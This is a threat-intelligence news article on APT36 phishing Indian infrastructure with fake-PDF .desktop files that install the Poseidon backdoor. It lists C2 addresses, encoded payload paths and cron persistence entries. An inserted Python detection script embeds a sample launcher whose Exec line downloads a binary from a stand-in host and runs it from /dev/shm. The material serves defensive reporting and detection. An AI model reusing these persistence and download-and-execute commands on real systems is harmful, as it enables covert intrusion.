APT36 Hackers Weaponizing PDF Files to Attack Indian Railways, Oil & Government Systems

In Cybersecurity News - Original News Source is cybersecuritynews.com by Blog Writer

The Pakistan-linked Advanced Persistent Threat (APT) group APT36, also known as Transparent Tribe, has significantly expanded its cyber operations beyond traditional military targets to encompass critical Indian infrastructure including railway systems, oil and gas facilities, and key government ministries.

This escalation represents a concerning shift in the threat landscape, as the group demonstrates increasingly sophisticated attack methodologies designed to penetrate and persist within India’s most sensitive operational networks.

The threat actors have refined their attack arsenal by weaponizing seemingly innocuous PDF documents through a deceptive technique involving malicious .desktop files.

These files masquerade as legitimate PDF documents but contain embedded scripts that execute in the background while displaying decoy content to unsuspecting victims.

The campaign specifically targets high-value entities including the Ministry of External Affairs, Indian Railways infrastructure, and energy sector organizations, indicating a strategic focus on disrupting critical national services.

Hunt.io researchers identified this campaign in July 2025, discovering over 100 phishing domains designed to impersonate Indian government organizations.

The researchers uncovered two distinct attack variants, each employing separate command and control infrastructure to maintain operational security and provide redundancy against defensive countermeasures.

The sophistication of this infrastructure suggests a well-resourced operation with long-term strategic objectives.

The attack methodology centers on the deployment of the Poseidon backdoor, a sophisticated malware built on the open-source Mythic command and control framework using the Go programming language.

This backdoor provides the attackers with comprehensive system access, enabling credential harvesting, lateral movement capabilities, and persistent surveillance of compromised networks.

The modular design allows operators to dynamically load additional functionality based on specific mission requirements.

Infection Mechanism and Technical Implementation

The infection chain begins when victims receive .desktop files disguised as official government documents, such as “National Anubhav Scheme-2025.pdf.”

Upon execution, these files deploy sophisticated evasion techniques including extended sleep timers and environment detection to bypass dynamic analysis systems.

The malware establishes persistence through automated cron job scheduling, ensuring continuous operation even after system reboots.

The technical implementation reveals two primary attack variants. The first variant utilizes a single command and control server at 209.38.203.53, employing base64-encoded URL paths to obfuscate payload locations:

# Base64-encoded C2 URL paths used by APT36, with their decoded values
/dG9nb2pvbW8=/p7zip-full  # Decoded: /togojomo/p7zip-full
/eXVndW5kdQ==/tcl-8.7     # Decoded: /yugundu/tcl-8.7

# Persistence mechanism using cron jobs
*/5 * * * * /dev/shm/emacs-bin &
*/10 * * * * ~/.local/share/crond-98 &
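As an added, defender-side example (not code from the article or from the Hunt.io report), the following Python triages a .desktop file for the traits described above, a document-like name on an Application entry, a delayed Exec that downloads and stages a binary in a scratch directory, and base64-encoded URL path segments, and decodes those segments. The sample .desktop content and the c2.example.invalid host are constructed for this example.

```python
import base64
import re
from configparser import ConfigParser

# Constructed sample for this example, not the real APT36 artifact: the Name imitates
# the lure cited above, while Exec sleeps, fetches a payload and stages it in /dev/shm.
SAMPLE_DESKTOP = """[Desktop Entry]
Type=Application
Name=National Anubhav Scheme-2025.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "sleep 60; curl -s http://c2.example.invalid/dG9nb2pvbW8=/p7zip-full -o /dev/shm/emacs-bin; chmod +x /dev/shm/emacs-bin; /dev/shm/emacs-bin &"
"""

DOC_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)$", re.I)
# A base64-looking path segment between two slashes ('/' is excluded from the class so
# neighbouring segments are not merged; the encoded paths on this page contain none).
B64_SEGMENT = re.compile(r"/([A-Za-z0-9+]{4,}={0,2})(?=/)")
STAGING_DIRS = ("/dev/shm", "/tmp", "/var/tmp", "~/.local/share", "~/.config")

def decode_b64_paths(text: str) -> list[tuple[str, str]]:
    """Return (encoded, decoded) for every path segment that is valid, printable base64."""
    found = []
    for m in B64_SEGMENT.finditer(text):
        seg = m.group(1)
        try:
            dec = base64.b64decode(seg, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # an ordinary word of the right length, not base64
        if dec.isprintable():
            found.append((seg, dec))
    return found

def triage_desktop(text: str) -> dict:
    """Flag a .desktop entry whose document-like presentation contradicts its Exec behaviour."""
    cp = ConfigParser(interpolation=None)
    cp.read_string(text)
    entry = cp["Desktop Entry"]
    name, exec_ = entry.get("Name", ""), entry.get("Exec", "")
    findings = []
    if entry.get("Type") == "Application" and DOC_EXT.search(name):
        findings.append("document-looking Name on an Application entry")
    if any(d in exec_ for d in STAGING_DIRS):
        findings.append("Exec stages or runs a binary from a scratch or hidden directory")
    if re.search(r"\bsleep\s+\d+", exec_):
        findings.append("Exec delays execution (analysis evasion)")
    if re.search(r"\b(curl|wget)\b", exec_):
        findings.append("Exec downloads content at runtime")
    if decoded := decode_b64_paths(exec_):
        findings.append("Exec URL carries base64-encoded path segment(s)")
    return {"name": name, "findings": findings, "decoded_paths": decoded}
```

Running `triage_desktop(SAMPLE_DESKTOP)` returns all five findings plus the decoded `togojomo` segment, while a plain editor launcher returns no findings.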

The second variant demonstrates enhanced resilience through redundant infrastructure, operating dual command and control servers at 165.232.114.63 and 165.22.251.224.

First variant of the malicious desktop (Source – Hunt.io)

Malicious payloads are strategically placed in system directories using names like “emacs-bin” and “crond-98” to blend with legitimate system processes, significantly complicating detection efforts.

Second variant of the malicious desktop (Source – Hunt.io)

The first figure illustrates the first attack variant’s execution flow, while the second shows the redundant infrastructure approach of the second variant.

C2 servers of Poseidon backdoor (Source – Hunt.io)

The Poseidon backdoor communicates with dedicated C2 servers at 178.128.204.138 and 64.227.189.57, both hosted on DigitalOcean infrastructure, utilizing port 7443 for secure command transmission.
